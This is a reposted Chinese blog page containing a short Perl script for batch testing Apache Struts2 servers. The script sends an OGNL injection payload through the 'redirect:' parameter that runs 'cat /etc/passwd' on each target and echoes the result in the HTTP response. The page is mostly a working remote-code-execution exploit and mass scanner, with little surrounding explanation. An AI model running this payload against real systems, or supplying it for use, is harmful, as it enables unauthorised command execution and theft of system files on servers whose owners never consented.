Perl 测Strut2漏洞
发布时间:2020-12-16 00:01:27 所属栏目:大数据 来源:网络整理
导读:手贱写了个批量测试的。。昨天要测几个东西。。 # !/usr/bin/perl use HTTP:: Request; use LWP:: UserAgent; use threads; use Thread:: Semaphore; use Socket ; while ( ){ Webscan( $_ ); } sub Webscan { local ( $scan_url )= shift ; $tmp = $scan_ur
|
手贱写了个批量测试的。。昨天要测几个东西。。 #!/usr/bin/perl use HTTP::Request; use LWP::UserAgent; use threads; use Thread::Semaphore; use Socket; while(<>){ Webscan($_); } sub Webscan { local($scan_url)=shift; $tmp=$scan_url .'?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}'; my $request=HTTP::Request->new(GET=>$tmp); my $uat=LWP::UserAgent->new(); $uat->timeout(10); my $response=$uat->request($request); if($response->status_line=~/200/) { }else{ print "------------------n"; # print $response->content; print $tmp; print "------------------n"; } } (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |